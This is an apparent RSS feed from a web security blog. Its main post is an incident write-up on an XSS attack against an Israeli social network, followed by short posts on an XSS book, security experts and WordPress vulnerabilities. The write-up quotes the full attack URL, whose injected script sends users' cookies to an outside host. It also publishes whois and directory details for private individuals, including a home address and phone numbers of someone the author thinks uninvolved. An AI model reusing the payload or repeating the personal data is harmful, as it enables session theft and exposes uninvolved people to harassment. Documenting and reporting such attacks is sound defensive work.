<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Recognize-Security &#187; Web Application Security</title>
	<atom:link href="http://www.rec-sec.com/category/web-application-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rec-sec.com</link>
	<description>a non-profit information security web site authored by Moshe Ben Abu (Trancer), focusing on vulnerability research, exploit development (mainly for the Metasploit Framework), web application security, information security and hacking news from around the world.</description>
	<lastBuildDate>Sun, 14 Mar 2010 17:44:35 +0000</lastBuildDate>
	<generator>http://www.rec-sec.com</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='www.rec-sec.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<atom:link rel="hub" href="http://pubsubhubbub.appspot.com" />
	<atom:link rel="hub" href="http://superfeedr.com/hubbub" />
			<item>
		<title>The Case of a TinyURL in Mekusharim</title>
		<link>http://www.rec-sec.com/2009/04/30/the-case-of-a-tinyurl-in-mekusharim/</link>
		<comments>http://www.rec-sec.com/2009/04/30/the-case-of-a-tinyurl-in-mekusharim/#comments</comments>
		<pubDate>Thu, 30 Apr 2009 13:19:29 +0000</pubDate>
		<dc:creator>Trancer</dc:creator>
				<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://www.rec-sec.com/?p=344</guid>
		<description><![CDATA[First of all, if you don&#8217;t know what Mekusharim is, here&#8217;s a little introduction:
Mekusharim is an Israeli social network founded in 2005 by three ambitious guys and currently have more then 1 million registered users. It&#8217;s very similar to any standard social network, it have users profile pages, albums, videos, mailing system and articles, pools [...]]]></description>
			<content:encoded><![CDATA[<p><img alt="Mekusharim" width="240" height="119" class="left" src="images/mekusharim_logo.png" />First of all, if you don&#8217;t know what Mekusharim is, here&#8217;s a little introduction:<br />
<a href="http://www.mekusharim.co.il/" title="Mekusharim - Social Network">Mekusharim</a> is an Israeli social network founded in 2005 by three ambitious guys and currently have more then 1 million registered users. It&#8217;s very similar to any standard social network, it have users profile pages, albums, videos, mailing system and articles, pools and forums sections.<br />
Recently <a href="http://www.globes.co.il/news/docview.aspx?did=1000437376&#038;fid=594" title="Globes - Walla! enlarge its share of Mekusharim social network to 70 percent of a 12.5 million NIS worth">Walla! acquired</a> additional 36 percent of Mekusharim in 4.5 million <abbr title="New Israeli Shekel">NIS</abbr> (out of 12.5 million <abbr title="New Israeli Shekel">NIS</abbr> value assessment), giving <a href="http://www.walla.co.il/" title="Walla!">Walla!</a> a total of 70 percent share holding of Mekusharim.<br />
I&#8217;ve had the pleasure of working with the Mekusharim guys on various security issues since 2006, mostly on finding and help fixing web application vulnerabilities.<br />
Like most of the social networks out there, Mekusharim is a great platform for attackers to spread their malware and reach a high amount of users in a short period of time, take <a href="http://namb.la/popular/tech.html" title="Technical explanation of The MySpace Worm">Samy</a> of <a href="http://www.myspace.com/" title="MySpace | A Place for Friends">MySpace</a> for example.<br />
The first time I contacted Mekusharim was right after I wrote a proof-of-concept web worm that can spread through the site, infecting users profile pages and stealing user cookies. It was written in two lines of JavaScript code and exploit a Cross-Site Scripting and a Cross-Site Request Forgery vulnerabilities.<br />
But that&#8217;s water under the bridge, Mekusharim have switched several systems (<abbr title="PHP: Hypertext Preprocessor">PHP</abbr> -&gt; <abbr title="Active Server Pages">ASP</abbr> -&gt; ASP.NET) and is much more secure nowadays. And if someone will try hacking it, I&#8217;ll be after the poor bastard :-)</p>
<p>Which brings us to the main subject of this post. Few days ago I got a mail message in Mekusharim from a friend user, that looks like this:<br />
<a href="images/screenshots/mekusharim_tinyurl1.png" title="Mekusharim TinyURL message" rel="lightbox"><img width="380" height="253" style="border-width:0" src="images/screenshots/mekusharim_tinyurl1.png" alt="Mekusharim TinyURL message" /></a><br />
<small>Click to enlarge.</small></p>
<p>As you can see, the message subject is &#8220;:)&#8221; and the message body contains a TinyURL link.<br />
Something smells fishy here&#8230; Previewing the link will discover that this is definitely a <abbr title="Cross-Site Scripting">XSS</abbr> attack:<br />
<a href="images/screenshots/mekusharim_tinyurl2.png" title="TinyURL preview" rel="lightbox"><img width="380" height="253" style="border-width:0" src="images/screenshots/mekusharim_tinyurl2.png" alt="TinyURL preview" /></a><br />
<small>Click to enlarge.</small></p>
<p>The TinyURL link redirects to:<br />
<code>http://www.mekusharim.co.il/forums/ForumsList.aspx?Display=1&#038;TagName='\';x=new%20Image();x.src="http://oritor.co.il/cgi-bin/mekusharim.php?cookie="%2Bdocument.cookie;//</code><br />
<a href="images/screenshots/mekusharim_tinyurl3.png" title="Cross-Site Scripting attack on Mekusharim" rel="lightbox"><img width="380" height="235" style="border-width:0" src="images/screenshots/mekusharim_tinyurl3.png" alt="Cross-Site Scripting attack on Mekusharim" /></a><br />
<small>Click to enlarge.</small></p>
<p>The <abbr title="Uniform Resource Locator">URL</abbr> exploits a <abbr title="Cross-Site Scripting">XSS</abbr> vulnerability in the forums system (<code>ForumsList.aspx</code> page, <code>TagName</code> parameter), sending the user cookie to the attacker pre-made page located at <code>oritor.co.il/cgi-bin/mekusharim.php</code>.</p>
<p>The first thing that crossed my mind is getting some information on <code>oritor.co.il</code> domain and his owner. Running a quick whois on the domain reveals a lot of useful information:<br />
<code><br />
domain:       oritor.co.il<br />
descr:        orit bokobza<br />
descr:        ezra 20<br />
descr:        rishon leztion<br />
descr:        75515<br />
descr:        Israel<br />
phone:        +972 50 8836620<br />
e-mail:       orit123 AT bezeqint.net<br />
admin-c:      LD-OB3906-IL<br />
tech-c:       LD-OB3906-IL<br />
zone-c:       LD-OB3906-IL<br />
nserver:      ns1.xoox.co.il<br />
nserver:      ns2.xoox.co.il<br />
validity:     16-12-2009<br />
status:       Transfer Locked<br />
changed:      domain-registrar AT isoc.org.il 20081216 (Assigned)<br />
person:       orit bokobza<br />
address:      ezra 20<br />
address:      rishon leztion<br />
address:      75515<br />
address:      Israel<br />
phone:        +972 50 8836620<br />
e-mail:       orit123 AT bezeqint.net<br />
nic-hdl:      LD-OB3906-IL<br />
changed:      domain-registrar AT isoc.org.il 20081216<br />
registrar name: LiveDns Ltd<br />
Registrar info: http://domains.livedns.co.il<br />
% Rights to the data above are restricted by copyright.<br />
</code></p>
<p>The domain <code>oritor.co.il</code> is registered to Orit Bokobza from Ezra 20 street, Rishon Leztion. Orit cellular phone number is 0508836620 (Pelephone) and she registered the domain using her <abbr title="Internet Service Provider">ISP</abbr> email address, which reveal that she&#8217;s registered to Bezeq International <abbr title="Internet Service Provider">ISP</abbr> under the username <code>orit123</code>. We also see that the site <abbr title="Domain Name System">DNS</abbr> is registered to <code>xoox.co.il</code> NS servers, we&#8217;ll get to that later.<br />
Digging deeper using <a href="http://www.b144.co.il/">b144.co.il</a>, searching Orit Bokobza from Rishon Leztion gives one identical match (same address and house number), reveal she have another cellular phone number &#8211; 0545455382 (Orange):<br />
<a href="images/screenshots/mekusharim_tinyurl4.png" title="b144 search" rel="lightbox"><img width="380" height="253" style="border-width:0" src="images/screenshots/mekusharim_tinyurl4.png" alt="b144 search" /></a><br />
<small>Click to enlarge.</small></p>
<p>b144 also gives us a map to the house and a picture of the house itself:<br />
<a href="images/screenshots/mekusharim_tinyurl5.png" title="b144 map and house picture" rel="lightbox"><img width="327" height="175" style="border-width:0" src="images/screenshots/mekusharim_tinyurl5.png" alt="b144 map and house picture" /></a><br />
<small>Click to enlarge.</small></p>
<p>Cool.<br />
Digging further, Googling her <a href="http://www.google.com/search?q=orit123+bezeqint.net" title="orit123 bezeqint.net - Google Search">email address</a> and retrieving additional information from her web site and posts from forums she&#8217;s active in reveals that she&#8217;s some kind of personal holistic trainer and has master in energetic healing.<br />
At this point I&#8217;m quite sure that she&#8217;s got nothing to do with this <abbr title="Cross-Site Scripting">XSS</abbr> attack on Mekusharim but it&#8217;s a good place to start investigating and tracking down the attacker. My guess is that her site is being used by the attacker who compromised the hosting server.<br />
Let&#8217;s take a look at what web sites is hosted on the same server using <a href="http://www.live.com/" title="Live Search">Live Search</a> <code>ip:</code> search feature:<br />
<a href="http://search.live.com/results.aspx?q=ip:91.198.129.47" title="ip:91.198.129.47 - Live Search">http://search.live.com/results.aspx?q=ip:91.198.129.47</a></p>
<p>We see that this hosting server also host <code>xoox.co.il</code> which is the same <code>oritor.co.il</code> site <abbr title="Domain Name System">DNS</abbr> provider as resolved from the whois. Something tells me the holistic master got no technical skills at all so <code>xoox.co.il</code> administrator will be a better person to talk to and get additional information about the <abbr title="Cross-Site Scripting">XSS</abbr> attack.<br />
Running whois on <code>xoox.co.il</code>:<br />
<code><br />
domain:       xoox.co.il<br />
descr:        Shlomi Rabia<br />
descr:        Agibor Almoni 13<br />
descr:        Tel Aviv<br />
descr:        67421<br />
descr:        Israel<br />
phone:        +972 50 7809313<br />
e-mail:       xoox AT bezeqint.net<br />
admin-c:      II-SR5955-IL<br />
tech-c:       II-SR5955-IL<br />
zone-c:       II-SR5955-IL<br />
nserver:      ns1.xoox.co.il<br />
nserver:      ns10.rehost.co.il<br />
validity:     14-10-2010<br />
status:       Transfer Allowed<br />
changed:      domain-registrar AT isoc.org.il 20041014 (Assigned)<br />
changed:      domain-registrar AT isoc.org.il 20041017 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20041229 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20070510 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20070805 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20070809 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20080731 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20080731 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20080804 (Changed)<br />
changed:      domain-registrar AT isoc.org.il 20081026 (Changed)<br />
person:       Shlomi Rabia<br />
address:      Agibor Almoni 13<br />
address:      Tel Aviv<br />
address:      67421<br />
address:      Israel<br />
e-mail:       xoox AT bezeqint.net<br />
nic-hdl:      II-SR5955-IL<br />
changed:      domain-registrar AT isoc.org.il 20041014<br />
registrar name: Israel Internet Association ISOC-IL<br />
Registrar info: www.isoc.org.il<br />
% Rights to the data above are restricted by copyright.<br />
</code></p>
<p>This provide enough information for the right person to contact and conduct further investigation.</p>
<p>I gave all this information to the Mekusharim guys few hours after the attack started, hope this is enough information they need to stop the attack as soon as possible. Meanwhile, the <abbr title="Cross-Site Scripting">XSS</abbr> vulnerability got fixed.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rec-sec.com/2009/04/30/the-case-of-a-tinyurl-in-mekusharim/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>XSS Book</title>
		<link>http://www.rec-sec.com/2007/04/27/xss-book/</link>
		<comments>http://www.rec-sec.com/2007/04/27/xss-book/#comments</comments>
		<pubDate>Fri, 27 Apr 2007 10:56:53 +0000</pubDate>
		<dc:creator>Trancer</dc:creator>
				<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://www.rec-sec.co.il/index.php/2007/04/27/xss-book/</guid>
		<description><![CDATA[I guess you all know Cross-Site Scripting attacks are becoming more and more dangerous every day. In the Web 2.0 era, stealing a user cookie\session or hijacking a user browser is almost equal to compromising his box by exploiting a remote code execution vulnerability.
Computer experts say that in the not so far future, operating systems [...]]]></description>
			<content:encoded><![CDATA[<p><img alt="XSS Attacks - Cross Site Scripting Attacks Exploits and Defense front cover" width="259" height="319" class="right" src="images/xss-cover.png" />I guess you all know Cross-Site Scripting attacks are becoming more and more dangerous every day. In the Web 2.0 era, stealing a user cookie\session or hijacking a user browser is almost equal to compromising his box by exploiting a remote code execution vulnerability.<br />
Computer experts say that in the not so far future, operating systems will be no more then just a web browser, all the applications a user need will be online (take <a href="http://office.microsoft.com/" title="Microsoft Office Online">Office Online</a> and <a href="http://docs.google.com/" title="Google Docs &#038; Spreadsheets">Google Docs &#038; Spreadsheets</a> for example). Therefor the phrase &#8220;<strong><acronym title="Cross-Site Scripting">XSS</acronym> is the New Buffer Overflow, JavaScript Malware is the New Shell Code</strong>&#8221; is true, no wonder <acronym title="Cross-Site Scripting">XSS</acronym> made it the <a href="http://www.darkreading.com/document.asp?doc_id=103774" title="Cross-site Scripting - number one attack vector of 2006">number one attack vector of 2006</a>.<br />
So it&#8217;s about time someone will publish an <acronym title="Cross-Site Scripting">XSS</acronym> book.<br />
<a href="http://www.amazon.com/Cross-Site-Scripting-Attacks-Exploits/dp/1597491543/sr=1-1/qid=1170769149?ie=UTF8&#038;s=books" title="XSS Attacks - Cross Site Scripting Attacks Exploits and Defense"><acronym title="Cross-Site Scripting">XSS</acronym> Attacks &#8211; Cross Site Scripting Attacks Exploits and Defense</a> written by <a href="http://jeremiahgrossman.blogspot.com/" title="Jeremiah Grossman">Jeremiah Grossman</a>, <a href="http://ha.ckers.org/" title="ha.ckers.org web application security lab">Robert Hansen (RSnake)</a>, <a href="http://www.gnucitizen.org/" title="GNUCITIZEN">Petko D. Petkov (pdp)</a>, Anton Rager and Seth Fogie, is the first book ever made that is dedicated entirely to Cross-Site Scripting.<br />
From what we can see in the preview (<a href="http://ha.ckers.org/files/xss-book.zip" title="XSS Book - Chapter 5 and the Table of Contents">Chapter 5 and the Table of Contents</a>), this book is packed with a lot of attack techniques, covers the simplest attack to the most advanced, universal cross-site scripting attacks, <acronym title="Cross-Site Scripting">XSS</acronym> exploitation frameworks and a lot more. Worth grabbing a copy  :-)</p>
<p>For further information check out the book announcements in <a href="http://jeremiahgrossman.blogspot.com/2007/04/xss-attacks-book.html" title="Jeremiah Grossman - XSS Attacks book">Jeremiah&#8217;s</a>, <a href="http://ha.ckers.org/blog/20070423/xss-book-preview/" title="ha.ckers.org web application security lab - XSS Book Preview">RSnake&#8217;s</a> and <a href="http://www.gnucitizen.org/blog/xss-attacks-book-preview/" title="GNUCITIZEN - XSS Attacks Book Preview">pdp&#8217;s</a> blogs.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rec-sec.com/2007/04/27/xss-book/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Reflections on Web Application Security experts</title>
		<link>http://www.rec-sec.com/2007/04/11/reflections-on-web-application-security-experts/</link>
		<comments>http://www.rec-sec.com/2007/04/11/reflections-on-web-application-security-experts/#comments</comments>
		<pubDate>Wed, 11 Apr 2007 12:10:43 +0000</pubDate>
		<dc:creator>Trancer</dc:creator>
				<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://www.rec-sec.co.il/index.php/2007/04/11/reflections-on-web-application-security-experts/</guid>
		<description><![CDATA[Anurag Agarwal is posting on his blog reflections on Web Application Security experts.
He did a great job collecting a lot of material on each one of them. These guys are the best in their field and we all can learn from them.
Worth taking a look:

Reflection on Amit Klein
Reflection on RSnake
Reflection on Jeremiah Grossman
Reflection on Billy [...]]]></description>
			<content:encoded><![CDATA[<p>Anurag Agarwal is posting on his <a href="http://myappsecurity.blogspot.com/" title="Anurag Agarwal - Application Security Evangelist">blog</a> reflections on Web Application Security experts.<br />
He did a great job collecting a lot of material on each one of them. These guys are the best in their field and we all can learn from them.<br />
Worth taking a look:</p>
<ul>
<li><a href="http://myappsecurity.blogspot.com/2007/02/reflection-on-amit-klein.html" title="Reflection on Amit Klein">Reflection on Amit Klein</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/02/reflection-on-rsnake.html" title="Reflection on RSnake">Reflection on RSnake</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/02/reflection-on-jeremiah-grossman.html" title="Reflection on Jeremiah Grossman">Reflection on Jeremiah Grossman</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/03/reflection-on-billy-hoffman.html" title="Reflection on Billy Hoffman">Reflection on Billy Hoffman</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/03/reflection-on-sheeraj-shah.html" title="Reflection on Sheeraj Shah">Reflection on Sheeraj Shah</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/03/reflection-on-ivan-ristic.html" title="Reflection on Ivan Ristic">Reflection on Ivan Ristic</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/03/reflection-on-robert-auger.html" title="Reflection on Robert Auger">Reflection on Robert Auger</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/03/reflection-on-jeff-williams.html" title="Reflection on Jeff Williams">Reflection on Jeff Williams</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/04/reflection-on-chris-shiflett.html" title="Reflection on Chris Shiflett">Reflection on Chris Shiflett</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/04/reflection-on-ory-segal.html" title="Reflection on Ory Segal">Reflection on Ory Segal</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/04/reflection-on-nish-bhalla.html" title="Reflection on Nish Bhalla">Reflection on Nish Bhalla</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/04/reflection-on-andrew-van-der-stock.html" title="Reflection on Andrew Van Der Stock">Reflection on Andrew Van Der Stock</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/05/reflection-on-bill-pennington.html" title="Reflection on Bill Pennington">Reflection on Bill Pennington</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/05/reflection-on-caleb-sima.html" title="Reflection on Caleb Sima">Reflection on Caleb Sima</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/05/reflection-on-ryan-barnett.html" title="Reflection on ryan barnett">Reflection on ryan barnett</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/05/reflection-on-stefano-di-paola.html" title="Reflection on Stefano Di Paola">Reflection on Stefano Di Paola</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/06/reflection-on-saumil-shah.html" title="Reflection on Saumil Shah">Reflection on Saumil Shah</a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/06/reflection-on-pdp.html" title="Reflection on pdp">Reflection on <abbr title="Petko D Petkov">pdp</abbr></a></li>
<li><a href="http://myappsecurity.blogspot.com/2007/06/reflection-on-alex-stamos.html" title="Reflection on Alex Stamos">Reflection on Alex Stamos</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.rec-sec.com/2007/04/11/reflections-on-web-application-security-experts/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>What&#8217;s up with Wordpress security?</title>
		<link>http://www.rec-sec.com/2007/03/27/whats-up-with-wordpress-security/</link>
		<comments>http://www.rec-sec.com/2007/03/27/whats-up-with-wordpress-security/#comments</comments>
		<pubDate>Tue, 27 Mar 2007 12:45:45 +0000</pubDate>
		<dc:creator>Trancer</dc:creator>
				<category><![CDATA[Web Application Security]]></category>

		<guid isPermaLink="false">http://rec-sec.com/index.php/2007/03/27/whats-up-with-wordpress-security/</guid>
		<description><![CDATA[The last few months has been rough for Wordpress programmers, from a security point of view.
Wordpress is the most common blog\content management system on the internet today and because of that it has become one of the favorite targets for attackers\security researchers.
A quick search will show you how bad the situation is, here, here and [...]]]></description>
			<content:encoded><![CDATA[<p><img alt="WordPress" width="212" height="68" class="left" src="images/wp-logo.png" />The last few months has been rough for <a href="http://wordpress.org/" title="Wordpress web site">Wordpress</a> programmers, from a security point of view.<br />
Wordpress is the most common blog\content management system on the internet today and because of that it has become one of the favorite targets for attackers\security researchers.<br />
A quick search will show you how bad the situation is, <a href="http://www.google.com/search?q=site%3Amilw0rm.com+wordpress" title="Google Search: milw0rm.com+wordpress">here</a>, <a href="http://www.google.com/search?q=site%3Asecuriteam.com+wordpress" title="Google Search: securiteam.com+wordpress">here</a> and <a href="http://www.google.com/search?q=site%3Asecurityfocus.com+wordpress" title="Google Search: securityfocus.com+wordpress">here</a>.<br />
Some of the vulnerabilities are really simple, but the most interesting ones are the complex vulnerabilities. the <a href="http://www.milw0rm.com/exploits/3095" title="Wordpress Trackback UTF-7 SQL Injection Exploit">Trackback <abbr title="7-bit Unicode Transformation Format">UTF-7</abbr> <abbr title="Structured Query Language">SQL</abbr> Injection</a> found by <a href="http://www.hardened-php.net/" title="Hardened-PHP Project Homepage">Stefan Esser</a> and the <a href="http://www.milw0rm.com/exploits/3109" title="Wordpress wp-trackback.php Remote SQL Injection Exploit">wp-trackback.php Remote <abbr title="Structured Query Language">SQL</abbr> Injection</a> found by <a href="http://retrogod.altervista.org/" title="rgod web pages">rgod</a> for example.<br />
If you&#8217;re a <abbr title="PHP Hypertext Preprocessor">PHP</abbr> programmer I suggest you download old versions of Wordpress and look at the vulnerable codes and exploits, I promise you&#8217;ll learn a thing or two..<br />
Another spicy piece of news is the <a href="http://wordpress.org/development/2007/03/upgrade-212/" title="Wordpress 2.1.1 backdoored">backdoored Wordpress systems (v2.1.1)</a> story, occurred earlier this month. that one really made me laugh :D</p>
<p>So what about Wordpress v2.1.2 (latest), secure right? I don&#8217;t think so&#8230;<br />
<a href="http://echo.or.id/adv/adv24-theday-2005.txt" title="Wordpress Full Path Disclosure Vulnerabilities Advisory">Full path disclosure vulnerabilities (by Dedi Dwianto)</a><br />
<a href="http://www.metaeye.org/advisories/40" title="Wordpress Redirection Vulnerability in wp-login.php - Metaeye Security Group">Redirection vulnerability in wp-login.php (by Metaeye Security Group)</a></p>
<p><strong>UPDATE:</strong><br />
<a href="http://www.notsosecure.com/folder2/2007/04/03/wordpress-212-xmlrpc-security-issues/" title="Wordpress xmlrpc.php 'post_id' Remote SQL Injection Vulnerability">xmlrpc.php Remote <abbr title="Structured Query Language">SQL</abbr> Injection Vulnerability</a> (<a href="http://www.milw0rm.com/exploits/3656" title="Wordpress xmlrpc.php Remote SQL Injection Exploit">exploit</a>) by <a href="http://www.notsosecure.com" title="NotSoSecure">NotSoSecure</a><br />
<a href="http://www.securityfocus.com/bid/23027" title="Wordpress PHP_Self Cross-Site Scripting Vulnerability"><abbr title="PHP Hypertext Preprocessor">PHP</abbr>_Self Cross-Site Scripting Vulnerability</a> (<a href="http://www.securityfocus.com/data/vulnerabilities/exploits/23027.html" title="Wordpress PHP_Self Cross-Site Scripting Exploit">exploit</a>) by Alexander Concha and Jungsonn.</p>
<p>Solution: Upgrade to <a href="http://wordpress.org/download/" title="Wordpress Download Page">Wordpress 2.1.3</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rec-sec.com/2007/03/27/whats-up-with-wordpress-security/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
